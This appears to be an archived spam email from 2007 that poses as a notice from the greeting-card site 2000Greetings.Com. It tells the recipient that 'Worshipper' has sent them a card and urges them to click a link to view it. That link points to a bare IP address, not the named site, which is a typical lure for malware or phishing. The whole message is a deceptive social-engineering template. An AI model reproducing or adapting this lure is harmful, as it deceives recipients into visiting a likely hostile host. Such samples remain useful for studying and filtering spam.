Subject: Worshipper sent you an ecard from 2000Greetings.Com!

From: "2000Greetings.Com" <[email-masked]>
Date: Fri, 10 Aug 2007 12:44:38 -0600

Worshipper has created a greeting ecard for you at 2000Greetings.Com,
the Internet's most popular greeting card service. 

Your greeting card ID is: e3d7703a3b01bdad81d9b848ca9a885b5e 

To see your custom greeting card, simply click on the link below: 
http://82.83.210.173/?e3d7703a3b01bdad81d9b848ca9a885b5e

Send greeting cards from 2000Greetings.Com whenever you want by visiting us at: 
http://2000Greetings.Com/
Copyright (c) 1996-2007 2000Greetings.Com All Rights Reserved